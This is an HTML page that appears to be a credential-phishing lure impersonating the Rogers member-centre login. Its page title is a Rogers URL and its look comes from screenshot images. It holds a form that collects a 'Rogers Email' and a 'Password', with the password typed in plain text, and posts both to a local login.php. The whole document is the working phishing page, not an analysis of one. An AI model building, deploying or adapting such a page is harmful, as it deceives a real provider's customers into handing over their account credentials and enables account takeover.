<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>https://rogersmembercentre.com/r</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1345px; height:649px; z-index:0"><img src="images/paste197.jpg" alt="" title="" border=0 width=1345 height=649></div>

<div id="image2" style="position:absolute; overflow:hidden; left:512px; top:442px; width:26px; height:30px; z-index:1"><img src="images/paste198.jpg" alt="" title="" border=0 width=26 height=30></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:308px;left:521px;top:340px;z-index:3;height: 41px;" placeholder="Rogers Email" required pattern="^\w+([.-]?\w+)*@\w+([.-]?\w+)*(.\w{2,3})+$">>
<input name="formtext2" type="text" style="position:absolute;width:308px;left:521px;top:393px;z-index:4;height: 41px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:608px; top:513px; z-index:5"><input type="image" name="formimage1" width="134" height="63" src="images/aski.JPG"></div>
<div id="formcheckbox1" style="position:absolute; left:521px; top:448px; z-index:6"><input type="checkbox" name="formcheckbox1"></div>
</form>


</body>
</html>
